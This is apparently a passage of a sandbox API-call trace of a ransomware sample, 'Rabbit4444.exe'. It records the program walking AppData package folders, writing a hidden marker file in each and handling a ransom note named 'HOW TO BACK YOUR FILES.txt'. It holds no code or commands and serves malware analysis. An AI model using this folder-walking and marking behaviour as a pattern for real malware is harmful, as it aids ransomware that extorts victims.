lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0065.260] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.263] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.266] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.267] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.267] CloseHandle (hObject=0x2a0) returned 1 [0065.267] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState") returned 105 [0065.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.267] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10812d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf037ef13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.267] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.267] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.268] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.268] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10812d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf037ef13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.268] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.268] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.268] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.268] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.268] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf037ef13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf037ef13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.268] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.268] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.268] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf037ef13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf037ef13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.268] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.268] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.268] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.269] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.269] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.269] CloseHandle (hObject=0x2cc) returned 1 [0065.269] CloseHandle (hObject=0x2a0) returned 1 [0065.269] GetCurrentThreadId () returned 0xd98 [0065.269] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0065.269] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache" [0065.269] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c148 | out: hHeap=0xe0000) returned 1 [0065.269] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0065.269] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache" [0065.269] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\" [0065.269] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0065.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.270] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.273] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.273] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.274] CloseHandle (hObject=0x2a0) returned 1 [0065.274] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache") returned 105 [0065.274] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.274] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1080f06, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0065.274] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.274] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.274] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.274] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.274] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1080f06, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.274] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.275] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.275] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.275] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.275] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.275] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03a5224, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03a5224, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.275] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.275] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.275] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03a5224, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03a5224, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.275] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0065.275] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.275] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.276] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.276] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.276] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.276] CloseHandle (hObject=0x2cc) returned 1 [0065.276] CloseHandle (hObject=0x2a0) returned 1 [0065.276] GetCurrentThreadId () returned 0xd98 [0065.277] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0065.277] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData" [0065.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0065.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0065.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData" [0065.277] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\" [0065.277] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0065.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.278] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.280] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.281] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.281] CloseHandle (hObject=0x2a0) returned 1 [0065.282] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData") returned 102 [0065.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10808b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0065.282] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.282] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.282] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.282] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.282] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10808b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03a5224, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.282] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.282] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.282] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.282] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.282] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.282] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03a5224, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03a5224, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03cb335, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.282] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.282] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.282] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03a5224, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03a5224, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03cb335, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.282] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0065.283] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.283] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.283] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.283] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.283] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.284] CloseHandle (hObject=0x2cc) returned 1 [0065.284] CloseHandle (hObject=0x2a0) returned 1 [0065.284] GetCurrentThreadId () returned 0xd98 [0065.284] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0065.284] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC" [0065.284] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0065.284] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0065.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC" [0065.284] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\" [0065.284] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0065.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.288] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.290] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.291] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.291] CloseHandle (hObject=0x2a0) returned 1 [0065.291] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC") returned 97 [0065.291] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.291] FindFirstFileW (in: 